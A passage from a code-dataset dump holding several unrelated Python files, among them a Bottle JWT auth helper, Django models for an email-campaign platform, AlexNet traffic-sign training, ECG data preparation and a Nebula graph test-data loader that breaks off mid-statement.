= CreativeWork\n","sub_path":"share/normalize/v1_push.py","file_name":"v1_push.py","file_ext":"py","file_size_in_byte":7499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"650844061","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nExperiment to try out JWT based auth.\n\"\"\"\n\nimport functools\nimport datetime\nfrom bottle import request, abort\nimport jwt\n\n\nclass JWT(object):\n \"\"\"JWT token handling for bottle apps.\n \"\"\"\n def __init__(self, secret_key, algorithm='HS256'):\n self.secret_key = secret_key\n self.algorithm = algorithm\n\n def create_token(self, user, ttl=None):\n \"\"\"Creates a new signed JWT-valid token.\n\n :param user: the user\n :param ttl:\n :return: valid JWT with expiration signature\n \"\"\"\n payload = {}\n payload['sub'] = user\n payload['iat'] = datetime.datetime.utcnow()\n\n if ttl:\n payload['exp'] = datetime.datetime.utcnow() + \\\n datetime.timedelta(seconds=ttl)\n\n #logger.debug(\"Token created for payload: {}\".format(str(payload)))\n return jwt.encode(payload, self.secret_key, algorithm=self.algorithm)\n\n def _validate_token(self, token=''):\n \"\"\"Validate JWT token.\n\n :param token: a json webtoken string\n :return: the decrypted token data (dict)\n \"\"\"\n try:\n decoded = jwt.decode(\n token.split(\" \", 1).pop(),\n self.secret_key,\n algorithms=self.algorithm\n )\n if 'sub' in decoded:\n return decoded['sub']\n abort(401, 'Invalid access token provided.')\n except jwt.ExpiredSignatureError as e:\n abort(401, 'The access token has expired.')\n except jwt.DecodeError as e:\n abort(401, 'Invalid access token provided.')\n\n def auth_required(self, func):\n \"\"\"Decorator intended to be used with a bottle app.\n \"\"\"\n\n @functools.wraps(func)\n def wrapper(*a, **ka):\n\n user_token = request.get_header(\"Authorization\", '')\n user = self._validate_token(user_token) or False\n if user:\n ka['user'] = user\n return func(*a, **ka)\n\n return wrapper\n","sub_path":"lambda_bottle/jwt_token.py","file_name":"jwt_token.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"578807448","text":"from django.utils import timezone\nfrom datetime import datetime, timedelta\nfrom django.utils.dateformat import format\nfrom django.utils.dates import WEEKDAYS_ABBR\nfrom habits.models import Habit, HabitEntryBool, HabitEntryDecimal\n\n# Create your views here.\ndef getHabitData():\n # Get all active habits\n allActiveHabits = Habit.objects.filter(endDate=None)\n\n # last7Dates\n\n weekStart = 0\n while (datetime.now()+timedelta(days=weekStart)).isoweekday()!=1:\n weekStart -=1\n last7Dates = [datetime.now()+timedelta(days=x) for x in range(weekStart,weekStart+7)]\n last7Days = [WEEKDAYS_ABBR[x.weekday()] for x in last7Dates]\n \n # habit entries for last 7 days for each entry \n entryData = []\n for habit in allActiveHabits:\n tempArray = []\n todaySet = False\n for thisDate in last7Dates:\n if habit.habitIsDecimal:\n try:\n habitEntry = HabitEntryDecimal.objects.get(habit=habit, entryDate=thisDate)\n except HabitEntryDecimal.DoesNotExist:\n habitEntry = None\n else:\n try:\n habitEntry = HabitEntryBool.objects.get(habit=habit, entryDate=thisDate)\n except HabitEntryBool.DoesNotExist:\n habitEntry = None\n tempArray.append(habitEntry)\n if format(thisDate,\"d.m.y\") == format(datetime.now(), \"d.m.y\") and habitEntry:\n todaySet = True\n entryData.append( (habit, tempArray, todaySet) )\n return entryData, last7Days, last7Dates","sub_path":"displayer/habitHelper.py","file_name":"habitHelper.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"401170780","text":"import pickle\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\n# from sklearn.cross_validation import train_test_split\nfrom alexnet import AlexNet\nimport numpy as np\nfrom sklearn.utils import shuffle\nimport time\n\n# TODO: Load traffic signs data.\nwith open(\"train.p\", mode='rb') as f:\n train = pickle.load(f)\n\n# TODO: Split data into training and validation sets.\nfeatures = train['features']\nlabels = train['labels']\n\nX_train, X_val, y_train, y_val = train_test_split(features, labels, \n test_size = 0.33, \n random_state = 2016)\n\ngraph = tf.Graph()\n\nwith graph.as_default():\n\n# TODO: Define placeholders and resize operation.\n x = tf.placeholder(tf.float32, (None, 32, 32, 3))\n y = tf.placeholder(tf.int32, None)\n resized = tf.image.resize_images(x, [227,227])\n\n# TODO: pass placeholder as first argument to `AlexNet`.\n# By keeping `feature_extract` set to `True`\n# we indicate to NOT keep the 1000 class final layer\n# originally used to train on ImageNet.\n fc7 = AlexNet(resized, feature_extract=True)\n# NOTE: `tf.stop_gradient` prevents the gradient from flowing backwards\n# past this point, keeping the weights before and up to `fc7` frozen.\n# This also makes training faster, less work to do!\n fc7 = tf.stop_gradient(fc7)\n\n# TODO: Add the final layer for traffic sign classification.\n nb_classes = 43\n shape = (fc7.get_shape().as_list()[-1], nb_classes) \n w_tz = tf.Variable(tf.truncated_normal(shape=shape, \n stddev=tf.sqrt(2.0/shape[0])))\n b_tz = tf.zeros(shape[1])\n logits = tf.nn.xw_plus_b(fc7, w_tz, b_tz)\n\n# TODO: Define loss, training, accuracy operations.\n# HINT: Look back at your traffic signs project solution, you may\n# be able to reuse some the code.\n loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits, y))\n optimizer = tf.train.AdamOptimizer().minimize(loss)\n\n train_prediction = tf.nn.softmax(logits)\n \n# TODO: Train and evaluate the feature extraction model.\n\nacc_val = []\nloss_val = [] \n\nwith tf.Session(graph=graph) as sess: \n init = tf.global_variables_initializer()\n sess.run(init)\n \n nb_epochs = 1\n batch_size = 32\n \n def accuracy(pred, labels):\n return (np.sum(np.equal(np.argmax(pred, 1),labels)))/pred.shape[0]\n \n \n for epoch in range(nb_epochs):\n t0 = time.time()\n total_batch = np.int(X_train.shape[0]/batch_size)\n X_train, y_train = shuffle(X_train, y_train)\n for i in range(total_batch):\n offset = i * batch_size\n batch_x = X_train[offset:(offset+batch_size), ]/255.0\n batch_y = y_train[offset:(offset+batch_size)]\n sess.run([optimizer, train_prediction], \n feed_dict={x: batch_x, y: batch_y})\n \n for k in range(0, X_val.shape[0], 57):\n l, p = sess.run([loss, train_prediction], \n feed_dict={x: X_val[k:(k+57), ],\n y: y_val[k:(k+57)]})\n acc_val.append(accuracy(p, y_val[k:(k+57)]))\n loss_val.append(l)\n print(\"Epoch {}: \".format(epoch))\n print(\"Time spend: {}\".format(time.time()-t0))\n print(\"Validation Loss: {}\".format(np.mean(loss_val)))\n print(\"Validation Accuracy: {:.3%}\".format(np.mean(acc_val)))\n\n\"\"\"\n(As a point of reference one epoch over the training set takes roughly 53-55 \nseconds with a GTX 970.)\nEpoch 0: \nTime spend: 932.5579879283905\nValidation Loss: 16.838653564453125\nValidation Accuracy: 21.470%\n\"\"\" \n \n \n ","sub_path":"train_feature_extraction.py","file_name":"train_feature_extraction.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"615123523","text":"from django.db import models\nfrom core.dictcode import global_status, yes_no_status\n# Create your models here.\n\n\nclass BlasterBaseModel(models.Model):\n remark = models.TextField(verbose_name='备注', blank=True)\n create_time = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')\n status = models.SmallIntegerField(choices=global_status, verbose_name='状态', default=1)\n\n class Meta:\n abstract = True\n\n @classmethod\n def getAll(cls):\n return cls.objects.filter(status__gt=0).all().order_by('-id')\n\n\nclass Platform(BlasterBaseModel):\n name = models.CharField(max_length=255, blank=True, verbose_name='名称')\n describe = models.CharField(max_length=512, blank=True, verbose_name='描述')\n website = models.URLField(max_length=512, blank=True, verbose_name='页面链接地址')\n soap_api_url = models.URLField(max_length=512, blank=True, verbose_name='soap_api_url')\n http_api_url = models.URLField(max_length=512, blank=True, verbose_name='http_api_url')\n login_name = models.CharField(max_length=255, blank=True, verbose_name='登录名')\n login_pwd = models.CharField(max_length=255, blank=True, verbose_name='登录密码')\n api_class_path = models.CharField(max_length=512, blank=True, verbose_name='api类路径')\n api_run_funtion_path = models.CharField(max_length=512, blank=True, verbose_name='class名')\n login_option = models.TextField(\n blank=True, verbose_name='登陆选项', default='{\"username\": \"{login_name}\", \"password\": \"{login_pwd}\"}'\n )\n\n class Meta:\n verbose_name = '发送邮件平台'\n\n def __str__(self):\n return self.name\n\n\nclass Brand(BlasterBaseModel):\n Platforms = models.ForeignKey(Platform, null=True, on_delete=models.DO_NOTHING, verbose_name='所属平台')\n fid = models.IntegerField(verbose_name='原id')\n name = models.CharField(max_length=255, blank=True, verbose_name='名称')\n\n class Meta:\n verbose_name = '发送平台品牌'\n\n def __str__(self):\n return self.name\n\n\nclass Campaign(BlasterBaseModel):\n Brands = models.ForeignKey(Brand, null=True, on_delete=models.DO_NOTHING, verbose_name='所属品牌')\n fid = models.IntegerField(verbose_name='原id')\n name = models.CharField(max_length=255, blank=True, verbose_name='名称')\n create_time = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')\n create_date = models.DateTimeField(blank=True, verbose_name='平台创建时间')\n status = models.SmallIntegerField(choices=global_status, verbose_name='状态', default=1)\n is_overall = models.SmallIntegerField(choices=yes_no_status, verbose_name='是否整体', default=0)\n is_active = models.SmallIntegerField(choices=yes_no_status, verbose_name='是否活动', default=1)\n has_soap_api = models.SmallIntegerField(choices=yes_no_status, verbose_name='是否soap_api', default=1)\n\n class Meta:\n verbose_name = '发送平台活动'\n\n def __str__(self):\n return self.name\n\n @classmethod\n def getCampaignGroupByBrands(cls, Campaign_id=None):\n where = {'status__gt': 0, 'is_active': 1, 'has_soap_api': 1}\n if Campaign_id:\n where.update({'id': Campaign_id})\n brands = Brand.getAll()\n for b in brands:\n where.update({'Brands_id': b.id})\n b.Campaigns = cls.objects.filter(**where).all()\n return brands\n\n\nclass CampaignClassify(BlasterBaseModel):\n name = models.CharField(max_length=255, null=True, blank=True, verbose_name='分类名称')\n parentid = models.ForeignKey('CampaignClassify', null=True, blank=True,\n on_delete=models.DO_NOTHING, verbose_name='上一级')\n Campaigns = models.ManyToManyField(Campaign, blank=True, verbose_name='关联平台活动')\n\n class Meta:\n verbose_name = '发送活动区域自定义归类'\n\n def __str__(self):\n return self.name\n\n @classmethod\n def getFull(cls, pid=[], out_list=[]):\n if not pid:\n pd = list(cls.objects.filter(parentid_id=None).all())\n else:\n pd = list(cls.objects.filter(parentid_id__in=pid).all())\n if pd:\n pid = []\n [pid.append(r.id) for r in pd]\n out_list.extend(pd)\n return cls.getFull(pid, out_list)\n else:\n return out_list\n\n\nclass SendEmail(models.Model):\n \"\"\"\n 所有发送的邮箱\n \"\"\"\n email = models.EmailField(max_length=254, blank=True, verbose_name='邮箱', unique=True)\n teacher_id = models.IntegerField( verbose_name='客户id', blank=True, default=0)\n\n class Meta:\n verbose_name = '发送平台所有邮箱'\n\n def __str__(self):\n return self.email\n\n\nclass Mailing(BlasterBaseModel):\n Campaigns = models.ForeignKey(Campaign, null=True, on_delete=models.DO_NOTHING, verbose_name='所属平台活动')\n fid = models.IntegerField(verbose_name='原id')\n name = models.CharField(max_length=255, blank=True, verbose_name='名称')\n subject = models.CharField(max_length=255, blank=True, verbose_name='主题')\n preheader = models.CharField(max_length=255, blank=True, verbose_name='邮件头')\n kind = models.CharField(max_length=24, blank=True, verbose_name='邮件类型')\n priority = models.CharField(max_length=5, blank=True, verbose_name='邮件优先级(1-5,3=正常)')\n from_name = models.CharField(max_length=255, blank=True, verbose_name='from_name')\n sender_id = models.CharField(max_length=24, blank=True, verbose_name='sender_id')\n plaintext_msg = models.CharField(max_length=255, blank=True, verbose_name='plaintext_msg')\n attachment = models.CharField(max_length=12, blank=True, verbose_name='attachment')\n optin_confirm_candidate = models.SmallIntegerField(\n choices=yes_no_status, verbose_name='optin_confirm_candidate', default=0\n )\n\n history = models.TextField(verbose_name='历史', blank=True)\n last_mod_date = models.DateTimeField(verbose_name='最后修改时间', blank=True, null=True)\n last_def_sent_date = models.DateTimeField(verbose_name='最后投递时间', blank=True, null=True)\n last_mod_user = models.CharField(max_length=128, blank=True, verbose_name='最后修改人')\n weblink = models.CharField(max_length=255, blank=True, verbose_name='网址')\n\n total_sent = models.IntegerField(blank=True, verbose_name='投递总数', default=0)\n total_accepted = models.IntegerField(blank=True, verbose_name='投递成功', default=0)\n hardbounces = models.IntegerField(blank=True, verbose_name='硬退', default=0)\n softbounces = models.IntegerField(blank=True, verbose_name='软退', default=0)\n unsubscribers = models.IntegerField(blank=True, verbose_name='取消订阅', default=0)\n suspends = models.IntegerField(blank=True, verbose_name='临时取消订阅', default=0)\n spamcomplaints = models.IntegerField(blank=True, verbose_name='SPAM投诉数', default=0)\n unique_opens = models.IntegerField(blank=True, verbose_name='独立打开', default=0)\n total_renders = models.IntegerField(blank=True, verbose_name='呈现总数', default=0)\n unique_renders = models.IntegerField(blank=True, verbose_name='独立呈现', default=0)\n total_clickthroughs = models.IntegerField(blank=True, verbose_name='总点击次数', default=0)\n unique_clickthroughs = models.IntegerField(blank=True, verbose_name='独立点击', default=0)\n unique_link_clickthroughs = models.IntegerField(blank=True, verbose_name='独���链接点击', default=0)\n total_conversion = models.IntegerField(blank=True, verbose_name='转发总数', default=0)\n unique_conversion = models.IntegerField(blank=True, verbose_name='独立转发', default=0)\n is_email_mailing = models.SmallIntegerField(choices=yes_no_status, verbose_name='是否已获取明细', default=0)\n\n class Meta:\n verbose_name = '群发任务'\n\n def __str__(self):\n return self.name\n\n\nclass EmailMailing(BlasterBaseModel):\n SendEmails = models.ForeignKey(SendEmail, null=True, on_delete=models.DO_NOTHING, verbose_name='关联邮箱')\n Mailings = models.ForeignKey(Mailing, null=True, on_delete=models.DO_NOTHING, verbose_name='关联发送任务')\n hard = models.SmallIntegerField(choices=yes_no_status, verbose_name='硬退', default=0)\n soft = models.SmallIntegerField(choices=yes_no_status, verbose_name='软退', default=0)\n send = models.SmallIntegerField(choices=yes_no_status, verbose_name='投递成功', default=0)\n open = models.SmallIntegerField(choices=yes_no_status, verbose_name='打开', default=0)\n click = models.SmallIntegerField(choices=yes_no_status, verbose_name='点击', default=0)\n trigger = models.SmallIntegerField(choices=yes_no_status, verbose_name='触发', default=0)\n log_date = models.DateTimeField(blank=True, verbose_name='行为时间', null=True)\n\n class Meta:\n verbose_name = '邮箱-发送任务-投递状态'\n\n def __str__(self):\n return '{} {}'.format(self.Mailings.name, self.SendEmails.email)\n\n\n @classmethod\n def status(cls):\n return {'hard': '硬退', 'soft': '软退', 'send': '投递成功', 'open': '打开', 'click': '点击', 'trigger': '触发'}","sub_path":"sendblaster/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"219889403","text":"from scipy import signal\nfrom sklearn.decomposition import FastICA\nimport glob\nimport wfdb as wf\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n\ndef ann_vis_ex(path):\n # Select one of them\n\n # Read in the data\n record = wf.rdsamp(path)\n annotation = wf.rdann(path, 'atr')\n\n # Select one of the channels (there are two)\n chid = 0\n data = record[0]\n channel = data[:, chid]\n\n # Plot only the first 2000 samples\n howmany = 2000\n\n # Extract all of the annotation related infromation\n where = annotation.sample < howmany\n samp = annotation.sample[where]\n\n # Convert to numpy.array to get fancy indexing access\n types = np.array(annotation.symbol)\n types = types[where]\n\n # Calculate time values in seconds\n times = np.arange(howmany, dtype='float') / annotation.fs\n plt.plot(times, channel[: howmany])\n plt.xlabel('Time [s]')\n\n # Prepare qrs information for the plot\n qrs_times = times[samp]\n\n # Scale to show markers at the top\n qrs_values = np.ones_like(qrs_times)\n qrs_values *= channel.max() * 1.4\n\n # Also show annotation code\n # And their words\n for it, sam in enumerate(samp):\n # Get the annotation position\n xa = times[sam]\n ya = channel.max() * 0.5\n\n # Use just the first letter\n a_txt = types[it]\n plt.annotate(a_txt, xy=(xa, ya))\n\n plt.show()\n\n\ndef Ica_impl(X):\n # ica = FastICA(n_components=3)\n ica = FastICA()\n S_ = ica.fit_transform(X) # Reconstruct signals\n\n # Plot results\n\n plt.figure()\n\n models = [X, S_]\n names = ['Observations (mixed signal)',\n 'ICA recovered signals']\n colors = ['red', 'steelblue', 'orange']\n\n for ii, (model, name) in enumerate(zip(models, names), 1):\n plt.subplot(2, 1, ii)\n plt.title(name)\n for sig, color in zip(model.T, colors):\n plt.plot(sig, color=color)\n\n plt.subplots_adjust(0.09, 0.04, 0.94, 0.94, 0.26, 0.46)\n\n plt.show()\n\n\ndef beat_annotations(annotation):\n \"\"\" Get rid of non-beat markers \"\"\"\n # Declare beat types\n good = ['N', 'L', 'R', 'B', 'A', 'a', 'J', 'S', 'V', 'r', 'F', 'e', 'j', 'n', 'E', '/', 'f', 'Q', '?']\n ids = np.in1d(annotation.symbol, good)\n\n # We want to know only the positions\n beats = annotation.sample[ids]\n\n return beats\n\n\ndef convert_input(channel, annotation):\n \"\"\" Into output \"\"\"\n # Remove non-beat annotations\n beats = beat_annotations(annotation)\n\n # Create dirac-comb signal\n dirac = np.zeros_like(channel)\n dirac[beats] = 1.0\n\n # Use hamming window as a bell-curve filter\n width = 36\n kernel = signal.hamming(width)\n gauss = np.convolve(kernel, dirac, mode='same')\n\n return dirac, gauss\n\n\ndef convert_data(data, annotations, width):\n \"\"\" Into a batch \"\"\"\n # Prepare containers\n signals, labels = [], []\n\n # Convert both channels\n for it in range(2):\n channel = data[:, it]\n dirac, gauss = convert_input(channel, annotations)\n # Merge labels\n label = np.vstack([dirac, gauss])\n\n # Prepare the moving window\n sta = 0\n end = width\n stride = width\n while end <= len(channel):\n # Chop out the fragments\n s_frag = channel[sta: end]\n l_frag = label[:, sta: end]\n\n # Cumulate\n signals.append(s_frag)\n labels.append(l_frag)\n\n # Go forth\n sta += stride\n end += stride\n\n # Turn into arrays\n signals = np.array(signals)\n labels = np.array(labels)\n\n return signals, labels\n\n\n# records = paths\ndef make_dataset(records, savepath):\n \"\"\" Inside an array \"\"\"\n # Prepare containers\n signals, labels = [], []\n\n # Iterate files\n for path in records:\n record = wf.rdsamp(path)\n annotations = wf.rdann(path, 'atr')\n\n # Extract pure signals\n data = record[0]\n\n # Convert each channel into labeled fragments\n signal, label = convert_data(data, annotations, 1000)\n\n # Cumulate\n\n signals.append(signal)\n labels.append(label)\n\n # Convert to numpy.array\n signals = np.array(signals)\n labels = np.array(labels)\n\n # Write to disk\n np.save(savepath + \"/signals\", signals)\n np.save(savepath + \"/labels\", labels)\n\n\ndef create_datasets(records):\n \"\"\" Training, validation, test \"\"\"\n\n # Shuffle up deterministically\n np.random.seed(666)\n np.random.shuffle(records)\n\n # Make training ...\n make_dataset(records[:30], 'data/training')\n\n # ... validation ...\n make_dataset(records[30: 39], 'data/validation')\n\n # ... and test\n make_dataset(records[39: 48], 'data/test')\n\n\ndef next_batch(self, batch_size):\n \"\"\" Iterate \"\"\"\n # Go forth\n start = self.index_in_epoch\n self.index_in_epoch += batch_size\n\n if self.index_in_epoch > self.nof_examples:\n # Finished epoch\n self.epochs_completed += 1\n print('Data epochs done:', self.epochs_completed)\n\n # Shuffle the data accessing iterators (again)\n np.random.shuffle(self.ids)\n\n # Start next epoch\n start = 0\n self.index_in_epoch = batch_size\n\n end = self.index_in_epoch\n\n # Get random row numbers\n ids = self.ids[start: end]\n\n signals = self.training_set['signals'][ids]\n labels = self.training_set['labels'][ids]\n\n return signals, labels\n\n\ndef getmodel(seqlength, features, dimout):\n model = Sequential()\n model.add(Dense(128, activation=tf.nn.relu))\n model.add(Dense(2, activation=tf.nn.softmax))\n return (model)\n\n\ndef MyFlatten(yyt):\n yyt1 = np.array(yyt[1, :, :])\n for it in range(2, (yyt.shape[0] - 1)):\n yyt2 = np.array(yyt[it, :, :])\n yyt1 = np.append(yyt1, yyt2, 0)\n return yyt1\n","sub_path":"DataFun.py","file_name":"DataFun.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"153706370","text":"# For plotting the images\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\nfrom SOM import SOM\r\nfrom AffinityPropogation import AffinityPropogation\r\nimport csv\r\n\r\nnum_tracks = 50 #1974\r\na = []\r\nb = []\r\ndataset = 'C:/Users/Bharat Bojja/Documents/Programming/SongClassification/FullDataSet.csv'\r\nreader = csv.reader(open(dataset, 'rt'), delimiter=',', quoting=csv.QUOTE_NONE)\r\nnext(reader)\r\ni = 0\r\naudio_features = []\r\ntrack_names = []\r\nfor row in reader:\r\n audio_features.append(list(row[i] for i in range(7, 17)))\r\n track_names.append(list(row[i] for i in range(6, 7)))\r\n i += 1\r\n if i == num_tracks:\r\n break\r\n\r\n# Training inputs for tracks\r\naudio_features = np.asarray(audio_features, dtype=float)\r\n\r\n# Train a 20x30 SOM with 10 iterations\r\nsom = SOM(20, 30, 10, 50)\r\nsom.train(audio_features)\r\n\r\n# Get output grid\r\nimage_grid = som.get_centroids()\r\n\r\n# Map tracks to their closest neurons\r\nmapped = som.map_vects(audio_features)\r\n\r\n# Plot\r\nplt.imshow(image_grid[10])\r\nplt.title('Track SOM')\r\nplt.ylim([0,20])\r\nplt.xlim([0,30])\r\nfor i, m in enumerate(mapped):\r\n plt.text(m[1], m[0], track_names[i], ha='center', va='center',\r\n bbox=dict(facecolor='white', alpha=0.5, lw=0))\r\naff = AffinityPropogation(mapped)\r\nprint(track_names)\r\nplt.show()","sub_path":"SOM_Tester.py","file_name":"SOM_Tester.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"423687965","text":"# --coding:utf-8--\n#\n# Copyright (c) 2019 vesoft inc. All rights reserved.\n#\n# This source code is licensed under Apache 2.0 License,\n# attached with Common Clause Condition 1.0, found in the LICENSES directory.\n\n\nimport time\n\nfrom nebula2.Client import GraphClient\nfrom nebula2.ConnectionPool import ConnectionPool\nfrom nebula2.graph import ttypes\nfrom tests.common.configs import get_delay_time\n\n\nclass GlobalDataLoader(object):\n def __init__(self, data_dir, ip, port, user, password):\n self.data_dir = data_dir\n self.ip = ip\n self.port = port\n self.client_pool = ConnectionPool(ip=self.ip, port=self.port, network_timeout=0)\n self.client = GraphClient(self.client_pool)\n self.user = user\n self.password = password\n self.client.authenticate(self.user, self.password)\n\n def load_all_test_data(self):\n if self.client is None:\n assert False, 'Connect to {}:{}'.format(self.ip, self.port)\n self.load_nba()\n self.load_student()\n\n # The whole test will load once, for the only read tests\n def load_nba(self):\n nba_file = self.data_dir + '/data/nba.ngql'\n print(\"open: \", nba_file)\n with open(nba_file, 'r') as data_file:\n resp = self.client.execute(\n 'CREATE SPACE IF NOT EXISTS nba(partition_num=10, replica_factor=1, vid_type = fixed_string(30));USE nba;')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n lines = data_file.readlines()\n ddl = False\n ngql_statement = \"\"\n for line in lines:\n strip_line = line.strip()\n if len(strip_line) == 0:\n continue\n elif strip_line.startswith('--'):\n comment = strip_line[2:]\n if comment == 'DDL':\n ddl = True\n elif comment == 'END':\n if ddl:\n time.sleep(get_delay_time(self.client))\n ddl = False\n else:\n line = line.rstrip()\n ngql_statement += \" \" + line\n if line.endswith(';'):\n resp = self.client.execute(ngql_statement)\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n ngql_statement = \"\"\n\n # The whole test will load once, for the only read tests\n def load_student(self):\n resp = self.client.execute(\n 'CREATE SPACE IF NOT EXISTS student_space(partition_num=10, replica_factor=1, vid_type = fixed_string(8)); USE student_space;')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('CREATE TAG IF NOT EXISTS person(name string, age int, gender string);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('CREATE TAG IF NOT EXISTS teacher(grade int, subject string);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('CREATE TAG IF NOT EXISTS student(grade int, hobby string DEFAULT \"\");')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('CREATE EDGE IF NOT EXISTS is_schoolmate(start_year int, end_year int);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('CREATE EDGE IF NOT EXISTS is_teacher(start_year int, end_year int);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('CREATE EDGE IF NOT EXISTS is_friend(start_year int, intimacy double);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('CREATE EDGE IF NOT EXISTS is_colleagues(start_year int, end_year int);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n # TODO: update the time when config can use\n time.sleep(get_delay_time(self.client))\n\n resp = self.client.execute('INSERT VERTEX person(name, age, gender), teacher(grade, subject) VALUES \\\n \"2001\":(\"Mary\", 25, \"female\", 5, \"Math\"), \\\n \"2002\":(\"Ann\", 23, \"female\", 3, \"English\"), \\\n \"2003\":(\"Julie\", 33, \"female\", 6, \"Math\"), \\\n \"2004\":(\"Kim\", 30,\"male\", 5, \"English\"), \\\n \"2005\":(\"Ellen\", 27, \"male\", 4, \"Art\"), \\\n \"2006\":(\"ZhangKai\", 27, \"male\", 3, \"Chinese\"), \\\n \"2007\":(\"Emma\", 26, \"female\", 2, \"Science\"), \\\n \"2008\":(\"Ben\", 24, \"male\", 4, \"Music\"), \\\n \"2009\":(\"Helen\", 24, \"male\", 2, \"Sports\") ,\\\n \"2010\":(\"Lilan\", 32, \"male\", 5, \"Chinese\");')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('INSERT VERTEX person(name, age, gender), student(grade) VALUES \\\n \"1001\":(\"Anne\", 7, \"female\", 2), \\\n \"1002\":(\"Cynthia\", 7, \"female\", 2), \\\n \"1003\":(\"Jane\", 6, \"male\", 2), \\\n \"1004\":(\"Lisa\", 8, \"female\", 3), \\\n \"1005\":(\"Peggy\", 8, \"male\", 3), \\\n \"1006\":(\"Kevin\", 9, \"male\", 3), \\\n \"1007\":(\"WangLe\", 8, \"male\", 3), \\\n \"1008\":(\"WuXiao\", 9, \"male\", 4), \\\n \"1009\":(\"Sandy\", 9, \"female\", 4), \\\n \"1010\":(\"Harry\", 9, \"female\", 4), \\\n \"1011\":(\"Ada\", 8, \"female\", 4), \\\n \"1012\":(\"Lynn\", 9, \"female\", 5), \\\n \"1013\":(\"Bonnie\", 10, \"female\", 5), \\\n \"1014\":(\"Peter\", 10, \"male\", 5), \\\n \"1015\":(\"Carl\", 10, \"female\", 5), \\\n \"1016\":(\"Sonya\", 11, \"male\", 6), \\\n \"1017\":(\"HeNa\", 11, \"female\", 6), \\\n \"1018\":(\"Tom\", 12, \"male\", 6), \\\n \"1019\":(\"XiaMei\", 11, \"female\", 6), \\\n \"1020\":(\"Lily\", 10, \"female\", 6);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('INSERT EDGE is_schoolmate(start_year, end_year) VALUES \\\n \"1001\" -> \"1002\":(2018, 2019), \\\n \"1001\" -> \"1003\":(2017, 2019), \\\n \"1002\" -> \"1003\":(2017, 2018), \\\n \"1002\" -> \"1001\":(2018, 2019), \\\n \"1004\" -> \"1005\":(2016, 2019), \\\n \"1004\" -> \"1006\":(2017, 2019), \\\n \"1004\" -> \"1007\":(2016, 2018), \\\n \"1005\" -> \"1004\":(2017, 2018), \\\n \"1005\" -> \"1007\":(2017, 2018), \\\n \"1006\" -> \"1004\":(2017, 2018), \\\n \"1006\" -> \"1007\":(2018, 2019), \\\n \"1008\" -> \"1009\":(2015, 2019), \\\n \"1008\" -> \"1010\":(2017, 2019), \\\n \"1008\" -> \"1011\":(2018, 2019), \\\n \"1010\" -> \"1008\":(2017, 2018), \\\n \"1011\" -> \"1008\":(2018, 2019), \\\n \"1012\" -> \"1013\":(2015, 2019), \\\n \"1012\" -> \"1014\":(2017, 2019), \\\n \"1012\" -> \"1015\":(2018, 2019), \\\n \"1013\" -> \"1012\":(2017, 2018), \\\n \"1014\" -> \"1015\":(2018, 2019), \\\n \"1016\" -> \"1017\":(2015, 2019), \\\n \"1016\" -> \"1018\":(2014, 2019), \\\n \"1018\" -> \"1019\":(2018, 2019), \\\n \"1017\" -> \"1020\":(2013, 2018), \\\n \"1017\" -> \"1016\":(2018, 2019);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('INSERT EDGE is_friend(start_year, intimacy) VALUES \\\n \"1003\" -> \"1004\":(2017, 80.0), \\\n \"1013\" -> \"1007\":(2018, 80.0), \\\n \"1016\" -> \"1008\":(2015, 80.0), \\\n \"1016\" -> \"1018\":(2014, 85.0), \\\n \"1017\" -> \"1020\":(2018, 78.0), \\\n \"1018\" -> \"1016\":(2013, 83.0), \\\n \"1018\" -> \"1020\":(2018, 88.0);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('INSERT EDGE is_colleagues(start_year, end_year) VALUES \\\n \"2001\" -> \"2002\":(2015, 0), \\\n \"2001\" -> \"2007\":(2014, 0), \\\n \"2001\" -> \"2003\":(2018, 0), \\\n \"2003\" -> \"2004\":(2013, 2017), \\\n \"2002\" -> \"2001\":(2016, 2017), \\\n \"2007\" -> \"2001\":(2013, 2018), \\\n \"2010\" -> 